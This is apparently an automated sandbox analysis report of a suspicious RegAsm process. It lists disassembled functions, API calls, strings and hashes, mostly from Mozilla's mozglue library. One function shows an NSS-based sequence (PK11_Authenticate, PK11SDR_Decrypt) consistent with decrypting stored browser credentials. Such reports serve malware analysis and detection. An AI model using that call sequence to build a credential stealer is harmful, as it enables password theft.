Part of subcall function 6C2B5E60: GetCurrentThreadId.KERNEL32 ref: 6C2B5EB8
Part of subcall function 6C2B5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B5ECF
Part of subcall function 6C2B5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C2B5F27
Part of subcall function 6C2B5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C2B5F47
Part of subcall function 6C2B5E60: GetCurrentProcess.KERNEL32 ref: 6C2B5F53
Part of subcall function 6C2B5E60: GetCurrentThread.KERNEL32 ref: 6C2B5F5C
Part of subcall function 6C2B5E60: GetCurrentProcess.KERNEL32 ref: 6C2B5F66
Part of subcall function 6C2B5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C2B5F7E

free.MOZGLUE(?), ref: 6C2EF9C5
free.MOZGLUE(?), ref: 6C2EF9DA

Strings

Thread , xrefs: 6C2EF789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C2EF9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6C2EF71F
" attempted to re-register as ", xrefs: 6C2EF858

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 3e6f60e897e0daa6f48de2c531f64b346582ae1b44ee56b2116f61b734a63cf4
Instruction ID: 32ce323afe40e4df6c81a7de9ed5b57174d9a754085e59559d18f781fab1b1ef
Opcode Fuzzy Hash: 3e6f60e897e0daa6f48de2c531f64b346582ae1b44ee56b2116f61b734a63cf4
Instruction Fuzzy Hash: 22811971A047089FDB10DF24D440AABB7B9EF89308F95452DEC499BB51EB34D849CB92

Function 6C2B4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C2B4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C2B41F1
VerSetConditionMask.NTDLL ref: 6C2B4223
VerSetConditionMask.NTDLL ref: 6C2B422A
VerSetConditionMask.NTDLL ref: 6C2B4231
VerSetConditionMask.NTDLL ref: 6C2B4238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C2B4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C2B4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C2B427A
FreeLibrary.KERNEL32(?), ref: 6C2B4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C2B42C4
VerSetConditionMask.NTDLL ref: 6C2B42F6
VerSetConditionMask.NTDLL ref: 6C2B4302
VerSetConditionMask.NTDLL ref: 6C2B4309
VerSetConditionMask.NTDLL ref: 6C2B4310
VerSetConditionMask.NTDLL ref: 6C2B4317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C2B4324

Strings

Shcore.dll, xrefs: 6C2B425E
SetProcessDpiAwareness, xrefs: 6C2B4274

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 2b307f8ba8c72e4cd020359bab00b8ede5b98c5e705901d48a272635b0f97404
Instruction ID: 0501b9022a9cf4e3fa7230c82473d7e8b596165cc542e11b96db8f98cd11e2ac
Opcode Fuzzy Hash: 2b307f8ba8c72e4cd020359bab00b8ede5b98c5e705901d48a272635b0f97404
Instruction Fuzzy Hash: 4851F571A003196BEF106B748C49FAA777CDF86B58F15452CF945AB5C0CB7899408B90

Function 6C2EEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EEE60
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEE6D
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2EEEA5
CloseHandle.KERNEL32(?), ref: 6C2EEEB4
free.MOZGLUE(00000000), ref: 6C2EEEBB
GetCurrentThreadId.KERNEL32 ref: 6C2EEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EEECF

Part of subcall function 6C2EDE60: GetCurrentThreadId.KERNEL32 ref: 6C2EDE73
Part of subcall function 6C2EDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C2B4A68), ref: 6C2EDE7B
Part of subcall function 6C2EDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C2B4A68), ref: 6C2EDEB8
Part of subcall function 6C2EDE60: free.MOZGLUE(00000000,?,6C2B4A68), ref: 6C2EDEFE
Part of subcall function 6C2EDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C2EDF38

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

GetCurrentThreadId.KERNEL32 ref: 6C2EEF1E
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEF2B
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEF59
GetCurrentThreadId.KERNEL32 ref: 6C2EEFB0
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEFBD
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEFE1
GetCurrentThreadId.KERNEL32 ref: 6C2EEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF000

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2EF02F

Part of subcall function 6C2EF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2EF09B
Part of subcall function 6C2EF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2EF0AC
Part of subcall function 6C2EF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2EF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C2EF008
[I %d/%d] profiler_stop, xrefs: 6C2EEED7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 6559cb2abcdcb4c084e61af35af53868dd8790c2bfc5a67cab93e3d2e26be83c
Instruction ID: 0f30d9f1a0e059fc339bca015322d48be34df24228b3058ac4b2d125f9271edc
Opcode Fuzzy Hash: 6559cb2abcdcb4c084e61af35af53868dd8790c2bfc5a67cab93e3d2e26be83c
Instruction Fuzzy Hash: 0D51D1756002299FDF006B64E408BA577BCEF4E32DF55061EED1693B40DBBD5804CBA2

Function 6C2DD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C32E804), ref: 6C2DD047
GetSystemInfo.KERNEL32(?), ref: 6C2DD093
__Init_thread_footer.LIBCMT ref: 6C2DD0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C32E810,00000040), ref: 6C2DD0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C32E7B8,00001388), ref: 6C2DD147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C32E744,00001388), ref: 6C2DD162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C32E784,00001388), ref: 6C2DD18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C32E7DC,00001388), ref: 6C2DD1B1

Strings

MALLOC_OPTIONS, xrefs: 6C2DD0CB
: (malloc) Unsupported character in malloc options: ', xrefs: 6C2DD322
<jemalloc>, xrefs: 6C2DD268, 6C2DD311
MOZ_CRASH(), xrefs: 6C2DD277
Compile-time page size does not divide the runtime one., xrefs: 6C2DD26D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 037f3474f4a1e939671c3563e85c1cb780ef56eeefe95dcf5437c19d85c04365
Instruction ID: 6c87d2016e5af3f669b1e1d26cb0c83bb609c525c6843170c48c86904f03e146
Opcode Fuzzy Hash: 037f3474f4a1e939671c3563e85c1cb780ef56eeefe95dcf5437c19d85c04365
Instruction Fuzzy Hash: D781D170A047099BEF008F78C856BA977B9EB6670AF11012DED4297B80D779A805CFE1

Function 6C2B7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C2B8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C2B801D

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C2B802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C2B803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C2B808D

Part of subcall function 6C2BCA10: mozalloc_abort.MOZGLUE(?), ref: 6C2BCAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C2B809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C2B80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C2B80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C2B8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C2B8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C2B8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C2B817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2B8199

Strings

0>.l, xrefs: 6C2B811E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID: 0>.l
API String ID: 2721933968-2962869112
Opcode ID: 11bd8c22e364229304a046bb356d72e76fb4dae5ad80164575ac4d24c73ca189
Instruction ID: 8a8723e83ea962359bffeea780610c3621d0d21a9488ff8c2b79eb9c21024344
Opcode Fuzzy Hash: 11bd8c22e364229304a046bb356d72e76fb4dae5ad80164575ac4d24c73ca189
Instruction Fuzzy Hash: 965162B1E002195BDF00DBA9DC84AEFB7B9AF49268F180125EC19F7741E735D905CBA1

Function 0040C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C9A5

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
StrStrA.SHLWAPI(?,01342C48,00420B52), ref: 0040CAF7
StrStrA.SHLWAPI(00000000,01342AE0), ref: 0040CB1E
StrStrA.SHLWAPI(?,013425A0,00000000,?,00421458,00000000,?,00000000,00000000,?,0133AA28,00000000,?,00421454,00000000,?), ref: 0040CCA2
StrStrA.SHLWAPI(00000000,01342640), ref: 0040CCB9

Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0133A9B8), ref: 0040C871
Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
Part of subcall function 0040C820: PK11_GetInternalKeySlot.NSS3 ref: 0040C88A
Part of subcall function 0040C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C8A5
Part of subcall function 0040C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C8EB
Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
Part of subcall function 0040C820: PK11_FreeSlot.NSS3(?), ref: 0040C961

StrStrA.SHLWAPI(?,01342640,00000000,?,0042145C,00000000,?,00000000,0133A9B8), ref: 0040CD5A
StrStrA.SHLWAPI(00000000,0133ABC8), ref: 0040CD71

Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

lstrlenA.KERNEL32(00000000), ref: 0040CE44
CloseHandle.KERNEL32(00000000), ref: 0040CE9C
NSS_Shutdown.NSS3 ref: 0040CEAA

Strings

, xrefs: 0040C9C6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$K11_lstrlen$PointerSlot$??2@AuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
String ID:
API String ID: 4120691046-3916222277
Opcode ID: 506ee09c71326fac3e7cc04b7e92ca4b2dc02a0ed577630804e8f97fca29bf17
Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
Opcode Fuzzy Hash: 506ee09c71326fac3e7cc04b7e92ca4b2dc02a0ed577630804e8f97fca29bf17
Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A

Function 6C2EFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2EFADC
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EFAE9
GetCurrentThreadId.KERNEL32 ref: 6C2EFB31
GetCurrentThreadId.KERNEL32 ref: 6C2EFB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C2EFBF6
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EFC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6C2EFC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C2EFD15

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 181c3d273bf91400b72a1b81eafc1698749dfd1db89a640ea52ab1995f579abb
Instruction ID: 2978f3ec6016d1a35787423623e59c34e1484303101d4e78a05bd4dd414c3180
Opcode Fuzzy Hash: 181c3d273bf91400b72a1b81eafc1698749dfd1db89a640ea52ab1995f579abb
Instruction Fuzzy Hash: 9871EF71A047088FDB00DF28D444B9AB7F4AF8A708F91456EED499BB51E738A804CB92

Function 6C2B5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B5E9D

Part of subcall function 6C2C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B85
Part of subcall function 6C2C5B50: EnterCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5B90
Part of subcall function 6C2C5B50: LeaveCriticalSection.KERNEL32(6C32F688,?,?,?,6C2C56EE,?,00000001), ref: 6C2C5BD8
Part of subcall function 6C2C5B50: GetTickCount64.KERNEL32 ref: 6C2C5BE4

GetCurrentThreadId.KERNEL32 ref: 6C2B5EAB
GetCurrentThreadId.KERNEL32 ref: 6C2B5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C2B6017

Part of subcall function 6C2A4310: moz_xmalloc.MOZGLUE(00000010,?,6C2A42D2), ref: 6C2A436A
Part of subcall function 6C2A4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C2A42D2), ref: 6C2A4387

moz_xmalloc.MOZGLUE(00000004), ref: 6C2B5F47
GetCurrentProcess.KERNEL32 ref: 6C2B5F53
GetCurrentThread.KERNEL32 ref: 6C2B5F5C
GetCurrentProcess.KERNEL32 ref: 6C2B5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C2B5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C2B5F27

Part of subcall function 6C2BCA10: mozalloc_abort.MOZGLUE(?), ref: 6C2BCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2B55E1), ref: 6C2B5E8C

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2B55E1), ref: 6C2B605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2B55E1), ref: 6C2B60CC

Strings

GeckoMain, xrefs: 6C2B5ECE, 6C2B6015

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: b10132cb2b0b361a1c167230107192307671909b285b9d8dbf0712199d7a30fd
Instruction ID: 68d8e123f75232f74a243b78e904493c45f04bee5e0f7834585fbab68216856f
Opcode Fuzzy Hash: b10132cb2b0b361a1c167230107192307671909b285b9d8dbf0712199d7a30fd
Instruction Fuzzy Hash: 0B71F5B0A047449FDB04DF25C480A6AFBF4FF5A348F54492DE8869BB42DB74E848CB52

Function 6C2B9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C2A3217
Part of subcall function 6C2A31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C2A3236
Part of subcall function 6C2A31C0: FreeLibrary.KERNEL32 ref: 6C2A324B
Part of subcall function 6C2A31C0: __Init_thread_footer.LIBCMT ref: 6C2A3260
Part of subcall function 6C2A31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C2A327F
Part of subcall function 6C2A31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2A328E
